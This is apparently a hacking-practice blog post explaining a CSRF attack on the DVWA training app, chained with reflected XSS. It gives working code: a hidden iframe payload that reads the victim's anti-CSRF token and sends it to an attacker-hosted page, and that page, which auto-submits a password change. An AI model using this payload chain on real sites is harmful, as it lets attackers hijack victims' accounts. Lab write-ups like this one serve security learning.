I was training my hacking skills on the DVWA, for the attacks CRSF ( Cross Site Request Forgery ) and I found an elegant way to orchestrate the CRSF attack with iFrames.
Brief Explanation of CRSF
To make it simple, a CRSF is an attack consisting of making the victim do a request without their consent. To get the idea, it could be a link redirecting to : http://website_not_protected.com/change_password.php?new_password=hacked.
Without any protection from the website, a victim clicking on this link would change their password without noticing it. But it is not that easy ( fortunately .. ) and that change_password.php page usually requires you to be logged already. A way for a hacker to counter this would be to insert some code on the website to redirect you to the page without losing your session cookie ( what keeps you logged on the website ). In that perspective, the hacker needs another exploit to insert some code on the website.
The idea of the iFrames
The iFrames can be used in javascript to open another page, just like this :
<iframe type="hidden" id="iframe"
src="http://10.6.66.42/dvwa/vulnerabilities/csrf/"
onload="window.open('//10.6.66.64/index.php">
</iframe>
There are very powerful as an hacking tool, since they can be invisible for the user. Here, the iFrame opens a website we are hosting ( supposing our IP is 10.6.66.64 ). The idea will be to open such an iFrame by exploiting another breach, and calling our own page that will send a form to change the password of the user.
The attack
Usually, such an attack requires another weakness on the victim’s website. One of the most common exploit that can be used for a CRSF is a XSS. We are going to test our attack on the security high of the DVWA. We need first to prepare our page. We need to send a form to http://10.6.66.42/dvwa/vulnerabilities/csrf/ that requires a user_token. Here is the page we are going to host :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Exploit</title>
<meta name="referrer" content="no-referrer">
<style type="text/css" media="screen"></style>
</head>
<body >
<form method="GET" action="http://10.6.66.42/dvwa/vulnerabilities/csrf/" target="csrf-frame" id="csrf-form">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_conf" value="password">
<input type="hidden" name="user_token" value="<?php echo $_REQUEST['user_moken'];?>">
<input type="hidden" name="Change" value="Change">
</form>
<Script>document.getElementById("csrf-form").submit();</Script>
</body>
</html>The request will pass only if the value of user_token corresponds to the victim token. So the iFrame will need to grab that value, and give it to our page as paramater ( called moken here ). This value can be collected with the following javascript code on the password change page at http://10.6.66.42/dvwa/vulnerabilities/csrf/.
var moken = this.contentDocument.getElementsByName('user_token')[0].valuePutting all together, the idea is to create an iFrame that would request http://10.6.66.42/dvwa/vulnerabilities/csrf/, collect the token, and send it to our hosted page within the same iFrame. We can exploit the XSS Reflected page to call our iFrame :
<iframe type="hidden" id="iframe" src="http://10.6.66.42/dvwa/vulnerabilities/csrf/"
onload="
var moken = this.contentDocument.getElementsByName('user_token')[0].value;
window.open('//10.6.66.64/index.php?user_moken='+moken)
"
></iframe>